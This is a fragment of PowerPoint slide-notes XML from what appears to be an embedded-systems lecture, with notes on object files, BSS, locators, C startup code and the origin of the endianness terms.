              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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Step by step in commands</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B452892-2780-4C0C-A5BB-51F7CB11C414}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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Note that commands are “backwards” – middle endian</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Foo.o is ~1.5K (although only 10 bytes of code)</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B219F6D-554A-4091-A386-974B801A4467}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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6313FE8-2DB5-4E78-901F-17C35E1C169E}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4403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0484"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7EDB548-88F5-4FFB-BF5F-F6E297EAABA6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>54</a:t>
            </a:fld>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DBA6ABF-C010-4CF4-9A4D-E718E079C9ED}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4506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1508"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7719AD0E-EBF1-4296-94F0-9EC3F59391F9}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>55</a:t>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4651F6-B067-466E-8AEE-EA23376D8068}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4608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2532"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75371FFF-D331-493A-BA7D-29CD75A61BF3}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr 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98568CA-5587-4EAA-AD73-FA90ED0F387D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4710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6DAF5B2-F782-4ECD-B13E-6A1687C9FF4A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr 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5345D97-FC29-42F9-83F6-58F25537E112}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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BCA0AD9F-2A4D-4142-BEAC-9D47ECAB9319}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>58</a:t>
            </a:fld>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dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30724" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DC931842-B02B-4332-8C05-A910D7DA5829}"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363A117-B769-45F6-8095-B54852A10B33}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4915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9E0F5E0-BF86-469F-9FBE-295342F6A5BE}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>59</a:t>
            </a:fld>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B1D8D1C-5365-49F2-865D-781882BB81E8}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501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E59B7C47-AD82-499F-9BE2-7A1FEA4528F3}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr 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09602BA-5863-4BCB-BE8B-04E9425F1D72}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5120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latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BSS = Block Started by Symbol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25604"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5B413E8D-8CED-4F2C-8B08-D2088A810DB2}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr 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Where is “var” allocated?</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D88F133-79E2-4364-AD5D-F6778163C138}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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99AD3B1-81C2-4585-AD48-4CCFAADCDDBB}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532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4580"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F2E1875A-B5C6-418D-9C9D-ADF7AEA1B4AF}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr 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E68C9AF-3BD4-4E25-99C8-0A241CFB016D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542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3A0A289C-0AE1-4CF3-BD5F-FB458A1F2552}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr 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F9EB5FB-007E-452B-86B2-1B2E87F51524}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55299" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553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66C3EEFF-982B-4C02-90F1-2B5F03A4ACF0}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr 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Where is “var” allocated?</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1FD0FBF-0925-4694-AFB2-E0EBAA802926}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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0F26578-0875-473C-B292-2E1FF9071F21}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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6628"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5C241C7-D775-4689-8E8A-8366164F816C}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr 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80C24CD-FC3D-4392-99BE-4E66AC8B2247}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5837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F9098033-34E1-47FB-AA64-03CDCCC7D178}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>72</a:t>
            </a:fld>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Difficult to define, no agreeable definition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For any definition, some characteristics apply only to a subset of systems that fall under it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Emphasize micro-processor, contradict with any electronic device i.e. wristwatch, old microwave oven</a:t>
            </a:r>
          </a:p>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205993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Is a locator mandatory? What happens in a “regular” system – where is the locator?</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26901897-00AB-4528-9784-4634803262CE}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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1360D65-EEDB-4E64-84CB-1BF4BAB5D448}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6042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B4BA9452-6C50-42C7-B1D7-C85B61DAFCAA}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr 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CC0DD16-D06F-417B-8487-1B9F7B74B2BC}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6144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What is the initialization for C?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reasons to override startup code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	Size - dependency on libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	performance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	Specific implementation of the above</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	Need to add additional initialization (OS requirement?)</a:t>
            </a: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17EE8EE5-61C0-4978-B24E-B6F06C84E245}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr 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B82DA04-9D8B-4ED8-BD49-57852CB3F793}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6246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a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note code after call to “main”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Handles the system in case the C program returns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Typically this code will halt the processor, reset the system, or open the debugging interface</a:t>
            </a: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94060A9-0F60-4AFC-9E15-26AB2B2F2CFA}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr 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5126209-A98B-4794-9415-AC5CFF355618}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6349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a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Explain initcopy, memset zeroing, enable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRP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5E9749DF-A3A8-43A1-9540-0524BFA712E7}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr 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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The terms big-endian and little-endian come from the book </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gulliver’s Travels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> by Jonathan Swift. It is satirical on the anglican vs. catholic church, and represents a stupid argument. On April 1, 1980, Danny Cohen published an article comparing this story to the never-ending argument in the computer world about  the byte ordering</a:t>
            </a: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25DBF9A-7974-49A7-9B71-4B1D7A629C45}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="120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F3B7266-5B48-4653-8C9B-C7C0ADCDF9D0}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2048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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The terms big-endian and little-endian come from the book </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gulliver’s Travels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
